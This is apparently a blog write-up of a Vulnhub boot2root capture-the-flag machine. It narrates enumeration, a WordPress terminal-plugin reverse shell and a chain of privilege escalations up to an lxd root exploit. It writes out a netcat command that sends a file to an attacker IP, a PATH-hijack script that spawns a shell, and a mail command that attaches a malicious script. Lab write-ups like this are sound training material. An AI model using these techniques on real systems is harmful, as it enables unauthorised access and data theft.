Welcome to the agency! Here we look only for the best of the best.

Do you think you got what it takes? Then step up and show us what you got!

This is a Boot2Root challenge. The final goal is to take the flag in /root.

This VM is created and tested with VMWare, but Vbox also should work just fine.

To begin with, the challenge was pretty intense. Usually a challenge will require priv escalation between one or two users. In this case we have six users to escalate to, before you get to the root.

The machine requires a lot of enumeration and patience. So lets begin…

As always, running netdiscover to find the IP in my network and starting the nmap scan.

Before we go over to the enumeration part, lets have a look at the vm itself:

Starting the VM, some usernames are already revealed. Good to have during the enumeration part.

As from the nmap output, we have ssh , http and some 222 ports open. There is some vulnerabilities existing for this 222 port. If you search for berkeley rshd with spx auth you will find some interesting information but for now lets enumerate the http ports.

Starting the enumeration with port 80.

All I found with dirsearch was this:

Lets run curl to see what that backup file contains.

Renaming the backup file to index.html and open it with Firefox:

Looking at the web page, you can find some encrypted lines where it says your challenge starts here. There is three different puzzles.

For the first puzzle I found a page where I could decrypt the cipher:

Running google translate and let is automatically detect the language:

translation:an instrument that has been published in Egypt, so let it go deeper, you will not get a message

That clue led nowhere and neither did the other puzzles but still it was fun to play with those ciphers. Lets see if Nikto finds anything interesting.

Running Nikto reveals that the hostname does not match the certificates name:

It´s a good idea to take a look at the certificate and see if we can find any useful information.

Now I have a subdomain name and a username. Looks like an email address

First thing to do is adding all the domain names to the /etc/hosts file so I can enumerate the services by the DNS names instead of the IP.

Browsing to the webpage and there is a robots.txt:

I tried this string as a file name name and password for ssh but there was nothing to find.

If we go back to the main page again, we will see that some kind of command is running with some output.

Waiting long enough to the end of the message, I found something that looks like morse code.

It is possible to perform user enumeration:

With user enumeration you can figure out if the application is using any default usernames.

Now that I know there is a wp page, I can fire up wpscan to enumerate the web site, all though I already have a username and password.

If you encounter the issues like your wpscan is not able to run, you probably need to upgrade the tool. You can find more info here. In your kali terminal run: gem update wpscan
Also to be able to scan the web site, you need to tell wpscan to avoid ssl-check by this command: wpscan — url https://nsa-xxxx.net/ — disable-tls-checks

There was also a db config file which was found by wpscan:

If there was other users, I should be able to find them with wpscan and also performing a brute force attack with the same tool but since that username was the only valid one, lets login to the page:

First I did some reasearch for SimTerm but the only interesting plugin was WPTerm so I used the WPTerm and clicking on terminal:

Access granted to the first user. I´m now able to run commands so the first thing to do is creating a reverse shell to enumerate the machine. Running nc to get a shell :

The tricky part here is that I have a lot of usernames and need to figure out whom I should escalate to first…

First thing I did was to log in to that db and see if there is any useful information. There is one table with a username

There is some files you will find during the enumeration and if you pay attention to one of them you will see that something sticks out: the capital letters.

I put the letters together and used it for authentication and it worked to login as that user.

Cool! Access granted to the second user…

Since that default SSH port is not working, the only way to escalate to this user is by running su USERNAME

User 3:

Enumerating this user´s privileges, I found out that the user is allowed to run sudo command without providing any passwords:

Press enter or click to view image in full size

This user is allowed to play with systemctl to start ssh, i ran netstat to see what happens before and after I run that sudo command. The default port of SSH is not possible to use for some reason and I think it is whitelisted for specific IP addresses. lets look at the netstat outputs:

Now I can ssh to the machine with this command:

ssh USERNAME@HOSTNAME -p 222

Pocking around this users home folder, I found a file called secret.png and running strings didn't gave me much so I transferred the file to my machine.

File transfer can be done with netcat. In your machine start nc listener:
nc -l -p $PORT > file.png
In victim machine run:
nc -w 3 $ATTACKER-IP $ATTACKER-PORT < file.png

Examining the file with hexdump:

Get Babak’s stories in your inbox

Join Medium for free to get updates from this writer.

hexdump -C secret.png | less:

Before running hexdump I tried to open the file but got an error. So lets change the header to .PNG with bless and see if it works this time:

You shoul also be able to run the command as TEXT if you don´t have the hex.!

Comparing the two files, now the secret2.png is a valid PNG file!

Nice! This string looks like a password…

I already have two users and this one is the third user which I need to escalate to. The solution is simple:

Try all the remaining usernames to ssh with that password:

Running sudo -l and I can see that even this user is allowed to run privileged command as another user (not as root) without providing password:

I can open another shell with “vi” as another user!

User 4:

Press enter or click to view image in full size

User 5:

The user´s home directory contains a file called check with root as owner.

I can either analyze the file in the victim machine or transfer it to my host.

Press enter or click to view image in full size

Looks like when the file get executed, the output is like netstat´s output.

Running the file with ltrace. Looks like it is executing the “ss” command.

You can find more info about ss here.

The ss command gets executed without providing the path. Lets exploit it by providing another path with another malicious file but with the same name.

Create a new file in /tmp:
Touch /tmp/check
Echo “/bin/bash” >> /tmp/check
Chmod +x /tmp/check
export PATH=/tmp:$PATH

Executing the file gave me shell as next user!

User 6:

The fifth users home directory contains several directories, where one of them is containing the password of that user. There is also another directory called /.vnc. Usually when one configures vnc, a password needs to be provided during the configuration. Then a file with that password (encrypted)will get created. I was able to find that password and decrypt it.

Tried to figure out the reason to that vnc directory and if some other user or service is using with that password. But that was not the case.

I went back to some other users and tried to run the vnc command. I was able to configure the vnc and getting the same directories after the configuration as my current user, so that was not for any specific reason maybe!?

Also connecting to the remote desktop with vnc (just type nautlius in the terminal) but there was nothing more than what I already was able to access.

….

During the enumeration I found that some users are able to send and read emails and it seems like that this specific user is reading others emails.

That indicates to me that maybe this user is reading my emails and perhaps if I append a malicious file, it will get executed by that user.

To be able to send email in linux terminal you can run:
mail -s “SUBJECT” user@domain.com -A /tmp/executablefile.sh

I could see that the users that I´m targeting are getting emails but nothing happens so I decided to keep enumerating somewhere else.

Also since port 25 is open, I tried to see if I can enumerate the smpt by accessing the port with nc:

nc localhost 25

No authentication is enabled which means I´m not able to enumerate it further.

What else is left to enumerate!!!

By each time I´m escalating to a new user I run netstat command to see if there is new services running to exploit.
For every user that i manage to take over i notice that port 3306 is open. Also for each user I got their credentials, I connected to the db to see if there is any interesting information in their database.

So I connected to my current user´s db and there is some interesting information:

The user table is containing several usersnames and the corresponding hashes.

The sixth user´s password was retrieved and I´m able to ssh to the machine with this last user.

Root:

Lets enumerating the root…

The first thing I see in this user´s home folder is some files which indicates that there should be something with lxd.

I´ve seen priv escalation with lxd and tried to run the exploit.sh:

Looking at the exploit.sh and lxd-exploit.sh, they are the same files as the one in github to exploit lxd.

First thing to confirm the lxd vulnerability is of course to run the lxd command, but it looks like the bash command is not recognizable:

The lxd binary was not found so lets see if it´s hidden somewhere else:

Running :

Find / -type f -name lxd -print:

Changing the directory to /snap/bin and found som executable binaries:

And now I´m able to play with the container:

When i tried to run the lxd it was not found but after exporting the /snap/bin to the user´s path, i was able to run the exploit.

If you run exploit.sh you wont be able to escalte to root but that other file works fine:

And I´m able to run sudo commands to list the /root directory:

Thanks and I hope you enjoyed this challenge!

Defcon: 1 Vulnhub Write-up

Get Babak’s stories in your inbox